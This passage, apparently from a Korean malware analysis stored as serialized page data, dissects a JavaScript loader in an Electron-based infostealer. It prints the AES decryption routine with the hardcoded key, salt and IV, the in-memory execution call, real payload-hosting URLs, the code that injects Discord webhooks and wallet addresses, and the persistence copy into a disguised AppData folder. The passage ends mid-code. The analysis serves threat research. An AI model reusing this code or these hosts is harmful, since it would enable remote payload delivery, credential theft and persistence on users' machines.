순전히 ",[578,2877,1075],{}," 안에 숨겨진 악성 스크립트를 위한 런타임 래퍼 역할을 했음을 확인시켜 주었습니다.",[740,2880,2882],{"id":2881},"_53-정적-분석이-밝혀낸-것","5.3. 정적 분석이 밝혀낸 것",[526,2884,746],{},[526,2886,2887],{},"코드를 수동으로 검사함으로써, 저는 멀웨어 로직이 완전히 JavaScript 기반이며 Electron 런타임 내에서 실행됨을 확인했습니다. 스크립트는 다음을 수행하도록 설계되었습니다:",[630,2889,2890,2897,2902,2905],{},[633,2891,2892,2893,2896],{},"대체 URL에서 암호화된 페이로드(",[578,2894,2895],{},"pyth.zip",")를 다운로드합니다",[633,2898,2899,2901],{},[578,2900,2865],{},"을 사용해 아카이브를 추출합니다",[633,2903,2904],{},"문자열 치환을 수행하여 특정 자격 증명이나 지갑 주소를 주입합니다",[633,2906,2907,585,2910,2912,2913,2915],{},[578,2908,2909],{},"child_process.exec()",[578,2911,580],{},"를 통해 결과 Python 파일(",[578,2914,612],{},")을 실행합니다",[526,2917,2918,2919,2921,2922,2925],{},"결정적으로, 로더에는 ",[578,2920,601],{},"가 아직 존재하지 않는 경우 이를 ",[567,2923,2924],{},"사용자의 AppData 디렉터리로 복사하는"," 로직도 포함되어 있었습니다. 이는 지속성을 강화하고 감염 루프를 유지했습니다.",[557,2927,2929,2930,2932],{"id":2928},"_6-심층-분석-inputjs-암호화된-javascript-페이로드-로더","6. 심층 분석: ",[578,2931,2833],{}," – 암호화된 JavaScript 페이로드 로더",[526,2934,562],{},[526,2936,2937,2939],{},[578,2938,2833],{},"는 분석한 멀웨어 체인에서 중요한 구성 요소로, 암호화된 JavaScript 페이로드의 복호화 및 실행 허브 역할을 합니다. 이 스크립트는 자신의 핵심 기능을 강력한 암호화 계층 뒤에 숨기고 런타임에만 그 동작을 드러냅니다.",[740,2941,2943],{"id":2942},"_61-암호화-및-복호화-메커니즘","6.1 암호화 및 복호화 메커니즘",[526,2945,746],{},[526,2947,2948,2949,2951],{},"언뜻 보면 ",[578,2950,2833],{},"에는 읽을 수 있는 코드가 거의 없습니다. 그러나 그 주된 목적은 스크립트 자체에 저장된 크고 난독화된 JavaScript 블롭을 복호화하고 실행하는 것입니다.",[888,2953,2955],{"id":2954},"_611-복호화-로직","6.1.1 복호화 로직",[526,2957,894],{},[526,2959,2960,2961,2964],{},"이 스크립트는 네 개의 매개변수를 받는 ",[578,2962,2963],{},"decrypt()"," 함수를 정의합니다:",[630,2966,2967,2973,2979,2985],{},[633,2968,2969,2972],{},[578,2970,2971],{},"encdata",": 암호화된 Base64 인코딩 데이터",[633,2974,2975,2978],{},[578,2976,2977],{},"masterkey",": 평문 패스프레이즈",[633,2980,2981,2984],{},[578,2982,2983],{},"salt",": 암호화 솔트(Base64)",[633,2986,2987,2990],{},[578,2988,2989],{},"iv",": AES 복호화를 위한 초기화 벡터(Base64)",[526,2992,2993,2994,2997],{},"복호화 과정은 Node.js의 내장 ",[578,2995,2996],{},"crypto"," 모듈을 사용해 구현됩니다. 진행 순서는 다음과 같습니다:",[2105,2999,3000,3111,3224],{},[633,3001,3002,3005,3006,3085],{},[567,3003,3004],{},"키 파생:","\n스크립트는 PBKDF2(Password-Based Key Derivation Function 2)를 사용해 256비트 대칭 키를 파생합니다:",[615,3007,3011],{"className":3008,"code":3009,"language":3010,"meta":530,"style":530},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[578,3012,3013,3035,3040,3057,3065,3072,3079],{"__ignoreMap":530},[1706,3014,3015,3019,3022,3025,3029,3032],{"class":1708,"line":1709},[1706,3016,3018],{"class":3017},"szBVR","const",[1706,3020,3021],{"class":2799}," key",[1706,3023,3024],{"class":3017}," =",[1706,3026,3028],{"class":3027},"sVt8B"," crypto.",[1706,3030,3031],{"class":2791},"pbkdf2Sync",[1706,3033,3034],{"class":3027},"(\n",[1706,3036,3037],{"class":1708,"line":531},[1706,3038,3039],{"class":3027},"  masterkey,\n",[1706,3041,3042,3045,3048,3051,3054],{"class":1708,"line":2091},[1706,3043,3044],{"class":3027},"  Buffer.",[1706,3046,3047],{"class":2791},"from",[1706,3049,3050],{"class":3027},"(salt, ",[1706,3052,3053],{"class":2795},"\"base64\"",[1706,3055,3056],{"class":3027},"),\n",[1706,3058,3059,3062],{"class":1708,"line":2097},[1706,3060,3061],{"class":2799},"  100000",[1706,3063,3064],{"class":3027},",\n",[1706,3066,3067,3070],{"class":1708,"line":2419},[1706,3068,3069],{"class":2799},"  32",[1706,3071,3064],{"class":3027},[1706,3073,3074,3077],{"class":1708,"line":2425},[1706,3075,3076],{"class":2795},"  \"sha512\"",[1706,3078,3064],{"class":3027},[1706,3080,3082],{"class":1708,"line":3081},7,[1706,3083,3084],{"class":3027},");\n",[630,3086,3087,3093,3099,3105],{},[633,3088,3089,3092],{},[567,3090,3091],{},"해시 함수:"," SHA-512",[633,3094,3095,3098],{},[567,3096,3097],{},"반복 횟수:"," 100,000",[633,3100,3101,3104],{},[567,3102,3103],{},"키 길이:"," 32바이트(256비트)",[633,3106,3107,3110],{},[567,3108,3109],{},"솔트:"," Base64 디코딩된 입력으로 제공됨",[633,3112,3113,3116,3117,3167,3169,3170],{},[567,3114,3115],{},"AES-256-CBC 복호화:","\n파생된 키는 이후 AES 복호화 객체를 생성하는 데 사용됩니다:",[615,3118,3120],{"className":3008,"code":3119,"language":3010,"meta":530,"style":530},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[578,3121,3122,3138,3145,3150,3163],{"__ignoreMap":530},[1706,3123,3124,3126,3129,3131,3133,3136],{"class":1708,"line":1709},[1706,3125,3018],{"class":3017},[1706,3127,3128],{"class":2799}," decipher",[1706,3130,3024],{"class":3017},[1706,3132,3028],{"class":3027},[1706,3134,3135],{"class":2791},"createDecipheriv",[1706,3137,3034],{"class":3027},[1706,3139,3140,3143],{"class":1708,"line":531},[1706,3141,3142],{"class":2795},"  \"aes-256-cbc\"",[1706,3144,3064],{"class":3027},[1706,3146,3147],{"class":1708,"line":2091},[1706,3148,3149],{"class":3027},"  key,\n",[1706,3151,3152,3154,3156,3159,3161],{"class":1708,"line":2097},[1706,3153,3044],{"class":3027},[1706,3155,3047],{"class":2791},[1706,3157,3158],{"class":3027},"(iv, ",[1706,3160,3053],{"class":2795},[1706,3162,3056],{"class":3027},[1706,3164,3165],{"class":1708,"line":2419},[1706,3166,3084],{"class":3027},[723,3168],{},"암호화된 페이로드는 표준 CBC(Cipher Block Chaining) 모드를 사용해 복호화됩니다:",[615,3171,3173],{"className":3008,"code":3172,"language":3010,"meta":530,"style":530},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[578,3174,3175,3204],{"__ignoreMap":530},[1706,3176,3177,3180,3183,3186,3189,3192,3195,3197,3199,3202],{"class":1708,"line":1709},[1706,3178,3179],{"class":3017},"let",[1706,3181,3182],{"class":3027}," decrypted ",[1706,3184,3185],{"class":3017},"=",[1706,3187,3188],{"class":3027}," decipher.",[1706,3190,3191],{"class":2791},"update",[1706,3193,3194],{"class":3027},"(encdata, ",[1706,3196,3053],{"class":2795},[1706,3198,646],{"class":3027},[1706,3200,3201],{"class":2795},"\"utf8\"",[1706,3203,3084],{"class":3027},[1706,3205,3206,3209,3212,3214,3217,3220,3222],{"class":1708,"line":531},[1706,3207,3208],{"class":3027},"decrypted ",[1706,3210,3211],{"class":3017},"+=",[1706,3213,3188],{"class":3027},[1706,3215,3216],{"class":2791},"final",[1706,3218,3219],{"class":3027},"(",[1706,3221,3201],{"class":2795},[1706,3223,3084],{"class":3027},[633,3225,3226,3229,3230,3233,3234,3255,3257],{},[567,3227,3228],{},"동적 실행:","\n복호화된 JavaScript 코드는 디스크에 절대 기록되지 않습니다. 대신 ",[578,3231,3232],{},"Function"," 생성자를 사용해 메모리에서 동적으로 실행됩니다:",[615,3235,3237],{"className":3008,"code":3236,"language":3010,"meta":530,"style":530},"new Function(\"require\", decrypted)(require);\n",[578,3238,3239],{"__ignoreMap":530},[1706,3240,3241,3244,3247,3249,3252],{"class":1708,"line":1709},[1706,3242,3243],{"class":3017},"new",[1706,3245,3246],{"class":2791}," Function",[1706,3248,3219],{"class":3027},[1706,3250,3251],{"class":2795},"\"require\"",[1706,3253,3254],{"class":3027},", decrypted)(require);\n",[723,3256],{},"이 기법은 파일리스 실행을 가능하게 하여, 디스크 기반 스캔에 의존하는 전통적인 안티바이러스 엔진의 탐지 가능성을 줄입니다.",[526,3259,3260],{},"이 접근은 키 파생, 강력한 암호화, 동적 메모리 내 실행을 결합함으로써 리버스 엔지니어링에 대한 계층화된 방어를 보여 줍니다.",[526,3262,3263],{},[567,3264,3265],{},"키 자료 및 암호화된 데이터",[526,3267,3268],{},"이 스크립트에는 다음과 같은 하드코딩된 입력이 포함되어 있습니다:",[630,3270,3271,3277,3286,3294],{},[633,3272,3273,3276],{},[567,3274,3275],{},"암호화된 데이터:"," 거대한 Base64 인코딩 블롭",[633,3278,3279,3282,3283],{},[567,3280,3281],{},"마스터 키:"," ",[578,3284,3285],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[633,3287,3288,3282,3290,3293],{},[567,3289,3109],{},[578,3291,3292],{},"maXtklzMEZRY9dbul/XPSw==","(Base64 인코딩)",[633,3295,3296,3282,3299,3293],{},[567,3297,3298],{},"IV:",[578,3300,3301],{},"HwK6sOz7FBbL+YsrOxtYUg==",[526,3303,3304,3305,3307],{},"이들은 모두 ",[578,3306,2833],{},"의 소스 코드에 직접 삽입되어 있습니다.",[740,3309,3311],{"id":3310},"_62-복호화-후-페이로드-동작","6.2 복호화 후 페이로드 동작",[526,3313,746],{},[526,3315,3316],{},"복호화되면, 삽입된 페이로드는 다음과 같은 악성 행위를 수행하는 완전한 JavaScript 프로그램이 됩니다:",[888,3318,3320],{"id":3319},"_621-환경-준비","6.2.1 환경 준비",[526,3322,894],{},[526,3324,3325],{},"복호화된 페이로드는 내장 Node.js 모듈을 사용해 실행 환경을 설정하는 것으로 시작합니다. 이 설정 단계는 어떤 악성 동작이 발생하기 전에 필요한 모든 경로와 작업 디렉터리가 명확하게 정의되도록 보장합니다.",[630,3327,3328,3361],{},[633,3329,3330,3333,3334,3337,3338],{},[567,3331,3332],{},"임시 디렉터리 해석:","\n멀웨어는 ",[578,3335,3336],{},"os.tmpdir()","를 호출해 현재 시스템의 임시 디렉터리 경로를 확인합니다. 임시 폴더는 일반적으로 쓰기 가능하고 엔드포인트 보호 시스템의 감시를 덜 받기 때문에, 이는 멀웨어의 흔한 전술입니다.",[615,3339,3341],{"className":3008,"code":3340,"language":3010,"meta":530,"style":530},"const tempDir = os.tmpdir();\n",[578,3342,3343],{"__ignoreMap":530},[1706,3344,3345,3347,3350,3352,3355,3358],{"class":1708,"line":1709},[1706,3346,3018],{"class":3017},[1706,3348,3349],{"class":2799}," tempDir",[1706,3351,3024],{"class":3017},[1706,3353,3354],{"class":3027}," os.",[1706,3356,3357],{"class":2791},"tmpdir",[1706,3359,3360],{"class":3027},"();\n",[633,3362,3363,3366,3367,3380],{},[567,3364,3365],{},"경로 구성:","\n이후 스크립트는 두 개의 중요한 파일에 대한 절대 경로를 구성합니다:",[630,3368,3369,3374],{},[633,3370,3371,3373],{},[578,3372,2895],{},": 실제 2단계 Python 기반 스틸러를 담은 아카이브",[633,3375,3376,3379],{},[578,3377,3378],{},"bnd.exe",": 지속성 백도어나 추가 페이로드 역할을 할 수 있는 선택적 실행 파일",[615,3381,3383],{"className":3008,"code":3382,"language":3010,"meta":530,"style":530},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[578,3384,3385,3408],{"__ignoreMap":530},[1706,3386,3387,3389,3392,3394,3397,3400,3403,3406],{"class":1708,"line":1709},[1706,3388,3018],{"class":3017},[1706,3390,3391],{"class":2799}," tempFile",[1706,3393,3024],{"class":3017},[1706,3395,3396],{"class":3027}," path.",[1706,3398,3399],{"class":2791},"join",[1706,3401,3402],{"class":3027},"(tempDir, ",[1706,3404,3405],{"class":2795},"\"pyth.zip\"",[1706,3407,3084],{"class":3027},[1706,3409,3410,3412,3415,3417,3419,3421,3423,3426],{"class":1708,"line":531},[1706,3411,3018],{"class":3017},[1706,3413,3414],{"class":2799}," binderFile",[1706,3416,3024],{"class":3017},[1706,3418,3396],{"class":3027},[1706,3420,3399],{"class":2791},[1706,3422,3402],{"class":3027},[1706,3424,3425],{"class":2795},"\"bnd.exe\"",[1706,3427,3084],{"class":3027},[526,3429,3430],{},"이 경로 설정은 OS별 경로 구문을 추상화하여 멀웨어가 모든 Windows 시스템에서 원활하게 작동할 수 있게 합니다. 또한 뒤이어 나오는 파일 다운로드 및 압축 해제 메커니즘의 기반을 마련합니다.",[888,3432,3434],{"id":3433},"_622-대체-전략을-갖춘-페이로드-다운로드","6.2.2 대체 전략을 갖춘 페이로드 다운로드",[526,3436,894],{},[526,3438,3439],{},"복호화된 JavaScript 페이로드의 두 번째 주요 단계는 원격 소스에서 악성 ZIP 아카이브를 다운로드하는 것을 포함합니다. 이 메커니즘은 복원력과 가용성을 높이기 위해 다층 대체 전략으로 설계되었습니다.",[630,3441,3442,3473,3558,3592],{},[633,3443,3444,3447,3448,3468,1761,3470,3472],{},[567,3445,3446],{},"Rentry.co를 통한 기본 링크 해석","\n스크립트는 텍스트 붙여넣기 서비스에서 동적 URL을 해석하는 것으로 시작합니다. 다음으로 GET 요청을 보냅니다:",[615,3449,3451],{"className":3008,"code":3450,"language":3010,"meta":530,"style":530},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[578,3452,3453],{"__ignoreMap":530},[1706,3454,3455,3457,3460,3462,3465],{"class":1708,"line":1709},[1706,3456,3018],{"class":3017},[1706,3458,3459],{"class":2799}," url",[1706,3461,3024],{"class":3017},[1706,3463,3464],{"class":2795}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[1706,3466,3467],{"class":3027},";\n",[723,3469],{},[578,3471,2895],{}," 아카이브의 실제 위치를 가리키는 평문 URL 문자열을 반환합니다. 이와 같은 리디렉션 메커니즘을 사용하는 것은 흔한 난독화 기법입니다. 실제 악성 URL을 추상화하여 정적 탐지를 더 어렵게 만듭니다.",[633,3474,3475,3478,3479,3511,3513,3514,3516,3517,3551,3553,3554,3557],{},[567,3476,3477],{},"다운로드 실행","\n해석된 URL은 이후 응답 스트림과 함께 Axios 라이브러리를 사용해 요청됩니다:",[615,3480,3482],{"className":3008,"code":3481,"language":3010,"meta":530,"style":530},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[578,3483,3484],{"__ignoreMap":530},[1706,3485,3486,3488,3491,3493,3496,3499,3502,3505,3508],{"class":1708,"line":1709},[1706,3487,3018],{"class":3017},[1706,3489,3490],{"class":2799}," fileResponse",[1706,3492,3024],{"class":3017},[1706,3494,3495],{"class":3017}," await",[1706,3497,3498],{"class":3027}," axios.",[1706,3500,3501],{"class":2791},"get",[1706,3503,3504],{"class":3027},"(fileUrl, { responseType: ",[1706,3506,3507],{"class":2795},"\"stream\"",[1706,3509,3510],{"class":3027}," });\n",[723,3512],{},"파일은 시스템의 임시 디렉터리에 ",[578,3515,2895],{},"으로 디스크에 기록됩니다:",[615,3518,3520],{"className":3008,"code":3519,"language":3010,"meta":530,"style":530},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[578,3521,3522,3540],{"__ignoreMap":530},[1706,3523,3524,3526,3529,3531,3534,3537],{"class":1708,"line":1709},[1706,3525,3018],{"class":3017},[1706,3527,3528],{"class":2799}," writer",[1706,3530,3024],{"class":3017},[1706,3532,3533],{"class":3027}," fs.",[1706,3535,3536],{"class":2791},"createWriteStream",[1706,3538,3539],{"class":3027},"(tempFile);\n",[1706,3541,3542,3545,3548],{"class":1708,"line":531},[1706,3543,3544],{"class":3027},"fileResponse.data.",[1706,3546,3547],{"class":2791},"pipe",[1706,3549,3550],{"class":3027},"(writer);\n",[723,3552],{},"이 다운로드는 이후 로직이 실행되기 전에 동기적 완료를 보장하기 위해 ",[578,3555,3556],{},"Promise","로 감싸집니다.",[633,3559,3560,3563,3564,3589,3591],{},[567,3561,3562],{},"대체 URL","\nRentry 기반 링크가 실패하면, 스크립트는 하드코딩된 백업 위치를 시도합니다:",[615,3565,3567],{"className":3008,"code":3566,"language":3010,"meta":530,"style":530},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[578,3568,3569,3580],{"__ignoreMap":530},[1706,3570,3571,3574,3576],{"class":1708,"line":1709},[1706,3572,3573],{"class":2791},"https",[1706,3575,1201],{"class":3027},[1706,3577,3579],{"class":3578},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[1706,3581,3582,3584,3586],{"class":1708,"line":531},[1706,3583,3573],{"class":2791},[1706,3585,1201],{"class":3027},[1706,3587,3588],{"class":3578},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[723,3590],{},"이 도메인들은 표준 TLS 검증 폴더의 일부처럼 보이도록 구성되어 있으며, 의심을 줄이기 위해 Let's Encrypt나 도메인 검증 경로를 모방했을 가능성이 있습니다. 각 대체는 동일한 스트리밍 및 파일 쓰기 로직으로 재시도됩니다.",[633,3593,3594,3597,3598,3601],{},[567,3595,3596],{},"견고성 및 난독화","\n이 대체 메커니즘은 멀웨어가 2단계 페이로드에 대해 여러 회수 경로를 갖도록 보장합니다. 동적 포인터(",[578,3599,3600],{},"rentry.co",")와 여러 장애 조치 미러의 사용은 멀웨어를 테이크다운, 차단, DNS 싱크홀에 더 강하게 만듭니다.",[526,3603,3604],{},"이 단계는 계층화된 이중화와 잘 위장된 전달 인프라를 사용하는, 멀웨어 제작자의 치밀한 운영 계획을 잘 보여 줍니다.",[630,3606,3607,3613],{},[633,3608,3609,3610,3612],{},"해석된 URL에서 ",[578,3611,2895],{},"을 다운로드합니다",[633,3614,3615,3616],{},"실패하면 대체 미러를 시도합니다:\n",[630,3617,3618,3623],{},[633,3619,3620],{},[578,3621,3622],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[633,3624,3625],{},[578,3626,3627],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[888,3629,3631],{"id":3630},"_623-페이로드-추출-및-조작","6.2.3 페이로드 추출 및 조작",[526,3633,894],{},[526,3635,3636,3638,3639,3641],{},[578,3637,2895],{}," 아카이브가 성공적으로 다운로드되어 디스크에 저장되면, 멀웨어는 그 내용을 추출하고 실행을 위해 준비하는 작업으로 진행합니다. 이는 ZIP 파일을 프로그래밍 방식으로 처리할 수 있게 하는 ",[578,3640,2865],{}," Node.js 라이브러리를 사용해 이루어집니다.",[630,3643,3644,3692,3717],{},[633,3645,3646,3649,3686,3688,3689,3691],{},[567,3647,3648],{},"ZIP 추출:",[615,3650,3652],{"className":3008,"code":3651,"language":3010,"meta":530,"style":530},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[578,3653,3654,3671],{"__ignoreMap":530},[1706,3655,3656,3658,3661,3663,3666,3669],{"class":1708,"line":1709},[1706,3657,3018],{"class":3017},[1706,3659,3660],{"class":2799}," zip",[1706,3662,3024],{"class":3017},[1706,3664,3665],{"class":3017}," new",[1706,3667,3668],{"class":2791}," AdmZip",[1706,3670,3539],{"class":3027},[1706,3672,3673,3676,3679,3681,3684],{"class":1708,"line":531},[1706,3674,3675],{"class":3027},"zip.",[1706,3677,3678],{"class":2791},"extractAllTo",[1706,3680,3402],{"class":3027},[1706,3682,3683],{"class":2799},"true",[1706,3685,3084],{"class":3027},[723,3687],{},"이는 아카이브의 모든 내용을 시스템의 임시 디렉터리로 추출합니다. ",[578,3690,3683],{}," 플래그는 기존 파일의 덮어쓰기를 보장합니다.",[633,3693,3694,3697,3699,3700],{},[567,3695,3696],{},"아카이브 내용:",[578,3698,2895],{}," 아카이브에는 완전히 번들된 Python 프로젝트가 포함되어 있으며, 다음을 포함합니다:",[630,3701,3702,3705,3708],{},[633,3703,3704],{},"정상 Python 패키지와 유사한 디렉터리 구조",[633,3706,3707],{},"여러 Python 모듈 및 의존성",[633,3709,3710,3713,3714,3716],{},[578,3711,3712],{},"Crypto/Util/astor.py","에 위치한 핵심 파일 ",[578,3715,612],{},". 주된 스틸러 페이로드입니다",[633,3718,3719,3333,3722,3724,3725,3745],{},[567,3720,3721],{},"플레이스홀더 치환:",[578,3723,612],{}," 내의 사전 정의된 플레이스홀더를 동적으로 치환하여 다음과 같은 공격자 제어 구성 데이터를 주입합니다:",[630,3726,3727,3730,3733,3739],{},[633,3728,3729],{},"Discord 웹훅 URL",[633,3731,3732],{},"암호화폐 지갑 주소(BTC, ETH, DOGE, LTC, XMR 등)",[633,3734,3735,3736,2040],{},"사용자 식별자(",[578,3737,3738],{},"%USERID%",[633,3740,3741,3742,2040],{},"오류 상태 플래그(",[578,3743,3744],{},"%ERRORSTATUS%",[615,3746,3748],{"className":3008,"code":3747,"language":3010,"meta":530,"style":530},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[578,3749,3750,3811,3824,3847,3857,3862,3867,3872,3878],{"__ignoreMap":530},[1706,3751,3752,3755,3758,3761,3764,3767,3770,3773,3776,3779,3782,3785,3787,3790,3793,3797,3799,3802,3805,3808],{"class":1708,"line":1709},[1706,3753,3754],{"class":3027},"fs.",[1706,3756,3757],{"class":2791},"readFile",[1706,3759,3760],{"class":3027},"(extractedDir ",[1706,3762,3763],{"class":3017},"+",[1706,3765,3766],{"class":2795}," \"",[1706,3768,3769],{"class":2799},"\\C",[1706,3771,3772],{"class":2795},"rypto",[1706,3774,3775],{"class":2799},"\\U",[1706,3777,3778],{"class":2795},"til",[1706,3780,3781],{"class":2799},"\\a",[1706,3783,3784],{"class":2795},"stor.py\"",[1706,3786,646],{"class":3027},[1706,3788,3789],{"class":2795},"'utf8'",[1706,3791,3792],{"class":3027},", (",[1706,3794,3796],{"class":3795},"s4XuR","err",[1706,3798,646],{"class":3027},[1706,3800,3801],{"class":3795},"data",[1706,3803,3804],{"class":3027},") ",[1706,3806,3807],{"class":3017},"=>",[1706,3809,3810],{"class":3027}," {\n",[1706,3812,3813,3816,3819,3821],{"class":1708,"line":531},[1706,3814,3815],{"class":3017},"  let",[1706,3817,3818],{"class":3027}," updatedFile ",[1706,3820,3185],{"class":3017},[1706,3822,3823],{"class":3027}," data\n",[1706,3825,3826,3829,3832,3834,3837,3840,3844],{"class":1708,"line":2091},[1706,3827,3828],{"class":3027},"    .",[1706,3830,3831],{"class":2791},"replace",[1706,3833,3219],{"class":3027},[1706,3835,3836],{"class":2795},"\"%DISCORD%\"",[1706,3838,3839],{"class":3027},", \u003C",[1706,3841,3843],{"class":3842},"s9eBZ","webhook",[1706,3845,3846],{"class":3027},">)\n",[1706,3848,3849,3852,3855],{"class":1708,"line":2097},[1706,3850,3851],{"class":3027},"    .replace(\"%ADDRESSBTC%\", \u003C",[1706,3853,3854],{"class":2799},"btc_address",[1706,3856,3846],{"class":3027},[1706,3858,3859],{"class":1708,"line":2419},[1706,3860,3861],{"class":3027},"    ...\n",[1706,3863,3864],{"class":1708,"line":2425},[1706,3865,3866],{"class":3027},"    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[1706,3868,3869],{"class":1708,"line":3081},[1706,3870,3871],{"emptyLinePlaceholder":325},"\n",[1706,3873,3875],{"class":1708,"line":3874},8,[1706,3876,3877],{"class":3027},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[1706,3879,3881],{"class":1708,"line":3880},9,[1706,3882,3883],{"class":3027},"});\n",[526,3885,3886],{},"이 동적 조작 단계는 필수적입니다. 공격자 제어 값의 삽입을 런타임까지 지연함으로써, 페이로드는 정적 탐지를 회피하고 운영자가 아카이브를 재패키징하지 않고도 표적과 유출 엔드포인트를 조정할 수 있게 합니다.",[630,3888,3889],{},[633,3890,3891,3893,3894],{},[578,3892,612],{},"의 플레이스홀더 문자열을 치환합니다:\n",[630,3895,3896,3902,3912],{},[633,3897,3898,3899],{},"Discord 웹훅: ",[578,3900,3901],{},"%DISCORD%",[633,3903,3904,3905,646,3908,3911],{},"지갑 주소: ",[578,3906,3907],{},"%ADDRESSBTC%",[578,3909,3910],{},"%ADDRESSETH%"," 등",[633,3913,3914],{},"사용자 ID 및 오류 플래그",[888,3916,3918],{"id":3917},"_624-멀웨어-실행","6.2.4 멀웨어 실행",[526,3920,894],{},[630,3922,3923],{},[633,3924,3925,3926],{},"astor.py로의 플레이스홀더 주입이 완료되면, 멀웨어는 시스템 호출을 통해 스틸러 실행을 개시합니다",[615,3927,3929],{"className":3008,"code":3928,"language":3010,"meta":530,"style":530},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[578,3930,3931],{"__ignoreMap":530},[1706,3932,3933,3936,3938,3941,3944,3947,3949,3952],{"class":1708,"line":1709},[1706,3934,3935],{"class":2791},"exec",[1706,3937,3219],{"class":3027},[1706,3939,3940],{"class":2795},"\"python.exe Crypto",[1706,3942,3943],{"class":2799},"\\\\",[1706,3945,3946],{"class":2795},"Util",[1706,3948,3943],{"class":2799},[1706,3950,3951],{"class":2795},"astor.py\"",[1706,3953,3084],{"class":3027},[526,3955,3956,3957,3959],{},"이 명령은 Node.js의 child_process.exec 함수를 사용해 실행되며, 삽입된 Python 페이로드를 별도의 프로세스에서 실행합니다. 이 특정 실행 패턴, 즉 ",[578,3958,1139],{}," 인수와 함께 실행되는 python.exe는 Microsoft Defender for Endpoint가 수집한 텔레메트리 데이터에서 관찰되었으며, 신뢰할 수 있는 탐지 아티팩트가 됩니다. 실제로 실행 체인은 다음과 같이 보입니다:",[526,3961,3962],{},"Microsoft Defender for Endpoint 텔레메트리에서 관찰된 전체 멀웨어 실행 체인은 다음 순서를 따릅니다:",[630,3964,3965,3974,3981,3988],{},[633,3966,3967,3969,3970,3973],{},[578,3968,605],{},"(Electron 기반 컨테이너)가 ",[578,3971,3972],{},"node.exe","를 호출합니다",[633,3975,3976,1292,3978,3980],{},[578,3977,3972],{},[578,3979,1129],{},"를 실행합니다",[633,3982,3983,1292,3985,3987],{},[578,3984,1129],{},[578,3986,580],{},"를 시작합니다",[633,3989,3990,1292,3992,3994],{},[578,3991,580],{},[578,3993,1139],{}," 파일을 실행합니다",[888,3996,3998],{"id":3997},"_625-지속성-강화","6.2.5 지속성 강화",[526,4000,894],{},[526,4002,4003,4004,4006],{},"감염된 시스템에서 장기적인 존재를 보장하기 위해, 복호화된 JavaScript 페이로드에는 최초 바이너리(",[578,4005,601],{},")를 사용자 프로필 내 숨겨진 위치로 복사하여 지속성을 재확립하는 로직이 포함되어 있습니다.",[526,4008,4009],{},[567,4010,4011],{},"대상 디렉터리",[526,4013,4014],{},"이 파일은 정상 Windows 구성 요소를 모방하는 디렉터리로 복사됩니다:",[615,4016,4018],{"className":3008,"code":4017,"language":3010,"meta":530,"style":530},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[578,4019,4020],{"__ignoreMap":530},[1706,4021,4022,4025,4028,4030],{"class":1708,"line":1709},[1706,4023,4024],{"class":3017},"%",[1706,4026,4027],{"class":2799},"APPDATA",[1706,4029,4024],{"class":3017},[1706,4031,4032],{"class":3027},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[526,4034,4035],{},"이 위치는 의도적으로 선택되었습니다:",[630,4037,4038,4041],{},[633,4039,4040],{},"%APPDATA%는 일반 사용자가 쓰기 가능하며 관리자 권한이 필요하지 않습니다.",[633,4042,4043],{},"디렉터리 이름이 정상 Microsoft 애플리케이션 폴더를 모방하여 덜 의심스럽게 만듭니다.",[526,4045,4046],{},[567,4047,4048],{},"복사 메커니즘:",[526,4050,4051],{},"복사 작업은 Node.js의 fs.copyFileSync() 함수를 사용합니다:",[615,4053,4055],{"className":3008,"code":4054,"language":3010,"meta":530,"style":530},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[578,4056,4057,4066,4076,4085,4094,4101,4108,4115,4122,4127],{"__ignoreMap":530},[1706,4058,4059,4061,4064],{"class":1708,"line":1709},[1706,4060,3754],{"class":3027},[1706,4062,4063],{"class":2791},"copyFileSync",[1706,4065,3034],{"class":3027},[1706,4067,4068,4071,4074],{"class":1708,"line":531},[1706,4069,4070],{"class":3027},"  process.env.",[1706,4072,4073],{"class":2799},"PORTABLE_EXECUTABLE_FILE",[1706,4075,3064],{"class":3027},[1706,4077,4078,4081,4083],{"class":1708,"line":2091},[1706,4079,4080],{"class":3027},"  path.",[1706,4082,3399],{"class":2791},[1706,4084,3034],{"class":3027},[1706,4086,4087,4090,4092],{"class":1708,"line":2097},[1706,4088,4089],{"class":3027},"    process.env.",[1706,4091,4027],{"class":2799},[1706,4093,3064],{"class":3027},[1706,4095,4096,4099],{"class":1708,"line":2419},[1706,4097,4098],{"class":2795},"    